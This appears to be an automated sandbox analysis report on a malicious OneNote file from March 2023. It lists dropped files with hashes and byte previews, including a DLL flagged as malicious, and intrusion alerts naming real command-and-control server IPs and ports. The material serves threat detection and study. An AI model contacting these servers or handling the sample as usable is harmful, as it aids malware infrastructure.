                                                                                                        Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:05:55], progressive, precision 8, 612x618, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):68633
                                                                                                        Entropy (8bit):7.709776384921022
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:tapXpSTJDOkFGdJdBk/slsbfsw1imaapnbvD8:U2OjJr6b07m1bvD8
                                                                                                        MD5:41241EE59AB7BC9EB34784E3BCE31CB4
                                                                                                        SHA1:98680761A51E9199CF3C89F68B5309FBEC7EE3CB
                                                                                                        SHA-256:035B26DF61855A3F36DBD30FDAB0C157C04C9E8AE2197EA4D4AEB3E82E6A4C2B
                                                                                                        SHA-512:3EE331D5BCEE4AD5D3FC9661D4AB4053F7D351591A094334F963C33C9D0E32CCCABE9334AD7C308108CE99617E064FE848DCD469ACD8D83FBE5C4452DE523D8F
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:05:55.............................d...........j...........................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?../$.W:SZ./...9.....-...u......r.....].c...@W_.7...+......v.+PD.I..-<1.pDn-\.....p.$....0.}V....\..>.~..XN.o..l(E....ik..o.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3879
                                                                                                        Entropy (8bit):7.9281351307465044
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                        MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                        SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                        SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                        SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):7374
                                                                                                        Entropy (8bit):7.955141875077912
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                        MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                        SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                        SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                        SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):53259
                                                                                                        Entropy (8bit):7.651662052139301
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:dCiCBBenRYWDBCipMYGTbYGLHbXxoP/qEF+MU50qyJ30h2W474S/Aq/xc4674bi5:dCiIQXBCiwbDLHD0/sFyVel4Pi4UgE
                                                                                                        MD5:2EE369ABB7936F8C28FF0ABDD224EA05
                                                                                                        SHA1:FE9D304A7B49E31EAE439369ABC548E265149636
                                                                                                        SHA-256:FB12D59B8BE911247BBAFDD416852E8B74B028005A141CB4DBBBA109B4B6ED2C
                                                                                                        SHA-512:5CF396CA472C32AE988600176114106CB1619404DD899A3867A5AB43DC90583B771EF69B14EF50E56A21F038BF51D8463C6ADD2DE9D4CB523F6290E24A4DECB3
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..AQa....q........"2..R..Bbr..#S....3$.....C.4v..(X.DtEUV.....cs..Td.5uf'Wgw8Hh........................!1Q.Aa....q.2...."R...r..3.t..U...B#S.4ub..C$d.5Ee&'7c.D%sT..............?.....?...k,lk^...M".Yo5.Qp.&s}b.m.:...W.x}.*.a......N1..d-n.-..^..b..TZ.W..."....F....^......ve5...^...2.:i...........~u2pK.z./&..u..L[I....Y....@y{|>..MN=:....Q[..H....a........|%..4fV....).....^.9b.f...F...p.=.W...aZ.........Z.t.n.....z3..[..lVh..\.N-.._.sK.y.._e.G.jig.a.7^....u...*.p.5.a.].........u/u..D.yl.XA..f.z..~.x.....N.....b=.uv.2.t.'.N.-.H..n.v.a.A[.Z.....T2...._...:....h..l.E..sm..a.3I...RE...fWb.Ek.0.#.)..Y#T...........u{....U....s.].7_H.2.`O6...P......}..4LR....]4.mid...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13084
                                                                                                        Entropy (8bit):7.940058639272698
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                        MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                        SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                        SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                        SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):5386
                                                                                                        Entropy (8bit):7.943706538857394
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                        MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                        SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                        SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                        SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):6080
                                                                                                        Entropy (8bit):1.084220066914904
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:Ras2DdmYyfi/UXmqBoO+SrrSX2WYR/nSbX/SXwcSPcugXIxASgd37REQQyvc3UgD:YpYYyf1TBoOW2M6wDJgCASg5VEQxAUCP
                                                                                                        MD5:9ACBB5340CC65AF7EA5A637606F43528
                                                                                                        SHA1:3210B0A456845038918D132A3CFB23C4095F7EB7
                                                                                                        SHA-256:DF915F047E0FEA058963DFF01B0148853BC27DA9F24ECDBDCFD077A9D94F96F7
                                                                                                        SHA-512:6EF9180F41A89E0C01CC08F4CC5DC78F07A9594826DA3E8D636D27EE3B51F5B137D15EAF323EC158A365D13EAD2C3D9692633E73556CDCA024C1102FD56742EE
                                                                                                        Malicious:false
                                                                                                        Preview:./.C..vL....W"v_d.f.M..K.-.._.8!................?.....I...............................................................................................................h............................................cM..U[N..%............Z.Y.?..F.). .................................7...7...7...7..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3873
                                                                                                        Entropy (8bit):3.478217776339977
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:uk8pidO5MEWDeIFrbqzqgdCDDGTCDGUoUpd5pidO5MEWDeh7+5DGqzWk7dCDGWGp:0MpDDMqfGRUoUp7MpDXLZhKCs4
                                                                                                        MD5:941E71E6B7E2D8CC147EE891A6AC6F17
                                                                                                        SHA1:A9F1E91FEA4FEB7EB48F63DE468E359084E8277F
                                                                                                        SHA-256:5493FFEB3323D7F5570B46BE716FFFD5BBCA7B1FC4C239A5E152613B6CFBBBC8
                                                                                                        SHA-512:0B0452E4A220B5D6FAA8CC19FBFC412ECBA0238BA854E1B27E247937CD9AC954F5EE4E802D9B9642FA2508234FF54B25D76E5901A481E4FE8C61D2AB3FE35547
                                                                                                        Malicious:false
                                                                                                        Preview:...................................FL..................F.@.. .....Q{....a.P.X....Q{...(............................P.O. .:i.....+00.../C:\.....................1......U2m..PROGRA~2.........L.qV.}....................V......g.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....j.1......PlP..MICROS~1..R.......PMPqV.}.....z....................C...M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.....Z.1......P8R..Office16..B.......PMPqV.}.....z........................O.f.f.i.c.e.1.6.....b.2.(...qP.. .ONENOTE.EXE.H......qP..qV.}....3.........................O.N.E.N.O.T.E...E.X.E.......k...............-.......j...........>.S......C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE....(.W.i.n.d.o.w.s. .+. .N.).../.s.i.d.e.n.o.t.e.<.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.O.f.f.i.c.e.1.6.\.O.N.E.N.O.T.E...E.X.E.........%ProgramFiles%\Microsoft Office\Office16\ONENOTE.EXE........................................................
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3873
                                                                                                        Entropy (8bit):3.478217776339977
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:uk8pidO5MEWDeIFrbqzqgdCDDGTCDGUoUpd5pidO5MEWDeh7+5DGqzWk7dCDGWGp:0MpDDMqfGRUoUp7MpDXLZhKCs4
                                                                                                        MD5:941E71E6B7E2D8CC147EE891A6AC6F17
                                                                                                        SHA1:A9F1E91FEA4FEB7EB48F63DE468E359084E8277F
                                                                                                        SHA-256:5493FFEB3323D7F5570B46BE716FFFD5BBCA7B1FC4C239A5E152613B6CFBBBC8
                                                                                                        SHA-512:0B0452E4A220B5D6FAA8CC19FBFC412ECBA0238BA854E1B27E247937CD9AC954F5EE4E802D9B9642FA2508234FF54B25D76E5901A481E4FE8C61D2AB3FE35547
                                                                                                        Malicious:false
                                                                                                        Preview:...................................FL..................F.@.. .....Q{....a.P.X....Q{...(............................P.O. .:i.....+00.../C:\.....................1......U2m..PROGRA~2.........L.qV.}....................V......g.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....j.1......PlP..MICROS~1..R.......PMPqV.}.....z....................C...M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.....Z.1......P8R..Office16..B.......PMPqV.}.....z........................O.f.f.i.c.e.1.6.....b.2.(...qP.. .ONENOTE.EXE.H......qP..qV.}....3.........................O.N.E.N.O.T.E...E.X.E.......k...............-.......j...........>.S......C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE....(.W.i.n.d.o.w.s. .+. .N.).../.s.i.d.e.n.o.t.e.<.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.O.f.f.i.c.e.1.6.\.O.N.E.N.O.T.E...E.X.E.........%ProgramFiles%\Microsoft Office\Office16\ONENOTE.EXE........................................................
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Archive, ctime=Tue Jun 30 15:57:16 2015, mtime=Fri Mar 17 14:44:46 2023, atime=Tue Jun 30 15:57:16 2015, length=157872, window=hide
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1251
                                                                                                        Entropy (8bit):4.652812202471964
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:8/o2pidOEIKDEWDzCh7+bAyNqzWFUTdCDhxYUUPOeDek7aB6m:8PpidO5MEWDeh7+MGqzWFwdCDtKChB6
                                                                                                        MD5:F17EE04210CFEF12B4B6D6603A246563
                                                                                                        SHA1:A11D8FD3FC6238DB73DF1C92F6E1722B637560AC
                                                                                                        SHA-256:D1F79B5E0BE28447C336E828374A7AA212C4B4A58A2802BEAD3C255FD0045307
                                                                                                        SHA-512:3DB6A10E03653A7E54F0C1EAD3D5B8320B8B258D6F110A2FA738EF843C44F4C3127703D853AF8F70EA4044090696C2C243943C3DD3CB8EB74B52684C7AE1D297
                                                                                                        Malicious:false
                                                                                                        Preview:L..................F.... ....>-.....O..f.X...>-......h...........................P.O. .:i.....+00.../C:\.....................1......U2m..PROGRA~2.........L.qV.}....................V......g.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....j.1......PlP..MICROS~1..R.......PMPqV.}.....z....................C...M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.....Z.1......P8R..Office16..B.......PMPqV.}.....z........................O.f.f.i.c.e.1.6.....f.2..h...F(. .ONENOTEM.EXE..J.......F(.qV.}....?.........................O.N.E.N.O.T.E.M...E.X.E.......l...............-.......k...........>.S......C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE....S.e.n.d. .t.o. .O.n.e.N.o.t.e.U.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.O.f.f.i.c.e.1.6.\.O.N.E.N.O.T.E.M...E.X.E.../.t.s.r.........*................@Z|...K.J.........`.......X.......760639...........!a..%.H.VZAj...d.r.h......
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):121940
                                                                                                        Entropy (8bit):6.7055092302056085
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:HDBoTVdaeNtuXndCrJJmT4HVnteV4FrdMiYcx7bfCb6HPdnX0:jBoC+tCYvSMVnte8ZP1Y6Jk
                                                                                                        MD5:59417C69C281E3FA9B40951FCF57C812
                                                                                                        SHA1:9BA0C1B7011D3B366E757C32C2DDEA2307940A57
                                                                                                        SHA-256:4E7CD2F8081303783E85ACF4C51BFE19702A4007E872FAC3E932132193D740B9
                                                                                                        SHA-512:FF0144828E21C6D0F09B05683DFCE29EEC287CAB0A626EA5A940D20643BA9330C93A1AC7FD0B3D76ABB3401DC44F9C02653669EA5CFF33B5274544D802D81D78
                                                                                                        Malicious:true
                                                                                                        Yara Hits:
                                                                                                        • Rule: JoeSecurity_MalOneNote, Description: Yara detected Malicious OneNote, Source: C:\Users\user\Desktop\Form - 16 Mar, 2023.one, Author: Joe Security
                                                                                                        Preview:.R\{..M..Sx.).......i.E.....&.................?.....I.......*...*...*...*..................................................._fh.*..E.......n..w.....................h...........................T...............A~/.g..C......q;............TL.E..!..................................<.7...7...7..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):6184
                                                                                                        Entropy (8bit):1.2271544223872926
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:YgYyf12dqVxoOgFCqEfuqB4qqlzCAS0VNyVPN4:vn1wKxoOnL2c4/+A+4
                                                                                                        MD5:CC14E0C8A926DFA82742003C080D78B8
                                                                                                        SHA1:C085A40801D2B10518FC8025E2205F77FBA5E6D3
                                                                                                        SHA-256:A16FF74ECA0431DD120D50ACFC5866399DCF0E1EB50999D07ECB011E5950A68F
                                                                                                        SHA-512:6A10C7CBFE3775207C026160772EA889A04316AD9D462B3677460B6076D5E128075F93EAA265A92DC8D836A5E762F2885488E1176376A336A41EE32FE8B8894A
                                                                                                        Malicious:false
                                                                                                        Preview:./.C..vL....W"v_.B.7p..I. ...x.0................?.....I...............................................................................................................h...........................(...............n.....`D.6...&.4...........zu..A.>...................................7...7...7...7..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):360064
                                                                                                        Entropy (8bit):7.517969654084059
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6144:urOEz5d1QI6vUih4AIqECkmw+uNBVMe56UveOAjNPyFj8XTcrOQM+:8z5d1AvUiWqrkmw/Me5cOuqF2TcOQM+
                                                                                                        MD5:30299115C365022EFBFDD1D4955D2BB7
                                                                                                        SHA1:CFFE5B39D479619CE5CE895C82F4E3EA0771F339
                                                                                                        SHA-256:14EC26D0290E7838C8B1FC49CAE9FDEBD423D819E3C6C0A536358740ED37B4E8
                                                                                                        SHA-512:F349A6C372FC329E8D60C0F0AE8D0492D307509A893B0422BEC2CE2CF05B49ED085A13E3E135E3B2A16D8D01537E3EF0273D59CD5A685C9956DCF9913007EEC8
                                                                                                        Malicious:false
                                                                                                        Preview:.R\{..M..Sx.)...^.,.EG..*..._^................?.....I.......*...*...*...*...................a................................B.7p..I. ...x.00....z..................h............................~......8.......N\...J%B.6...s-...........#)H.L...c.\.%.............................7...7...7...7..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Windows\System32\regsvr32.exe
                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):316928
                                                                                                        Entropy (8bit):7.337848702590508
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6144:cwNQMQTlfdUPABVy559hhR3iP7TfPYbrF1EFVw0todxKROsCt:rNbadDBkZ6rPeEFizdxxsCt
                                                                                                        MD5:BFC060937DC90B273ECCB6825145F298
                                                                                                        SHA1:C156C00C7E918F0CB7363614FB1F177C90D8108A
                                                                                                        SHA-256:2F39C2879989DDD7F9ECF52B6232598E5595F8BF367846FF188C9DFBF1251253
                                                                                                        SHA-512:CC1FEE19314B0A0F9E292FA84F6E98F087033D77DB937848DDA1DA0C88F49997866CBA5465DF04BF929B810B42FDB81481341064C4565C9B6272FA7F3B473AC5
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: ReversingLabs, Detection: 58%
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L`.=...n...n...nCy.o...nCy.o...nCy.o...n.z.o(..n.z.o...n.z.o...nCy.o...n...nq..n.z.o...n.z.o...n.zsn...n...n...n.z.o...nRich...n................PE..d....6.d.........." ...!.F...................................................0............ .............................................T...d...d....`..(....0............... ..........8...........................p...@............`..`............................text....D.......F.................. ..`.rdata.......`.......J..............@..@.data...............................@....pdata.......0......................@..@_RDATA..\....P......................@..@.rsrc...(....`......................@..@.reloc....... ......................@..B........................................................................................................................................................................................
                                                                                                        File type:data
                                                                                                        Entropy (8bit):6.730747997421387
                                                                                                        TrID:
                                                                                                        • Microsoft OneNote note (16024/2) 100.00%
                                                                                                        File name:Form - 16 Mar, 2023.one
                                                                                                        File size:120428
                                                                                                        MD5:fdb11bd1fb6eba5cb985a4bd5edda765
                                                                                                        SHA1:ad09e5d26784b4c56232ce74725d38c1e34647ea
                                                                                                        SHA256:8dbe6329f5086cd8ea55002897ca64d8a938ebb57c8a91d08f6cd927c3586f4a
                                                                                                        SHA512:eaf22339f90a9a54d99693c8ee9bb5c0a996f0141f8bcb1936cd7a5d901c61a1072644427ff44a61ba46561113c924a82f9ab9ec096d1ec9be736512a122733d
                                                                                                        SSDEEP:1536:RDBoTVdaeNtuXndCrJJmT4HVnteV4FrdMiYcx7bfCb6HPdnXX:1BoC+tCYvSMVnte8ZP1Y6JH
                                                                                                        TLSH:F6C33BF1A8025C0AE123C976B1FB661399D051ED42283B2BF87D507DD978A20D5DD8EF
                                                                                                        File Content Preview:.R\{...M..Sx.).......i.E......&.................?......I........*...*...*...*..................................................._fh.*..E.......n..w.....................h...........................8....... ....... ..}...M..t:."S.9.............TL.E..!......
                                                                                                        Icon Hash:d4dce0626664606c
                                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                        192.168.2.466.228.32.314970070802404330 03/17/23-16:45:57.481213TCP2404330ET CNC Feodo Tracker Reported CnC Server TCP group 16497007080192.168.2.466.228.32.31
                                                                                                        192.168.2.4164.90.222.65497074432404308 03/17/23-16:46:23.322113TCP2404308ET CNC Feodo Tracker Reported CnC Server TCP group 549707443192.168.2.4164.90.222.65
                                                                                                        192.168.2.4167.172.199.1654970680802404308 03/17/23-16:46:17.940894TCP2404308ET CNC Feodo Tracker Reported CnC Server TCP group 5497068080192.168.2.4167.172.199.165
                                                                                                        192.168.2.4104.168.155.1434970880802404302 03/17/23-16:46:27.711698TCP2404302ET CNC Feodo Tracker Reported CnC Server TCP group 2497088080192.168.2.4104.168.155.143
                                                                                                        192.168.2.4182.162.143.56497014432404312 03/17/23-16:46:04.229854TCP2404312ET CNC Feodo Tracker Reported CnC Server TCP group 749701443192.168.2.4182.162.143.56
                                                                                                        192.168.2.491.121.146.474969880802404344 03/17/23-16:45:48.322318TCP2404344ET CNC Feodo Tracker Reported CnC Server TCP group 23496988080192.168.2.491.121.146.47
                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Mar 17, 2023 16:44:36.915174961 CET49696443192.168.2.4203.26.41.131
                                                                                                        Mar 17, 2023 16:44:36.915246964 CET44349696203.26.41.131192.168.2.4
                                                                                                        Mar 17, 2023 16:44:36.915354013 CET49696443192.168.2.4203.26.41.131
                                                                                                        Mar 17, 2023 16:44:36.918745041 CET49696443192.168.2.4203.26.41.131
                                                                                                        Mar 17, 2023 16:44:36.918783903 CET44349696203.26.41.131192.168.2.4
                                                                                                        Mar 17, 2023 16:45:08.509952068 CET49696443192.168.2.4203.26.41.131
